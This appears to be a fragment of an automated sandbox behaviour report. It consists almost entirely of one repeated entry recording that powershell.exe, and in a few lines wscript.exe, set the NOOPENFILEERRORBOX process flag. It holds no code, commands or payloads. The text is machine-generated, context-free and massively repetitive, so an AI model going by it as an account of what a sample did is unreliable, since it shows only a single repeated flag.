          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
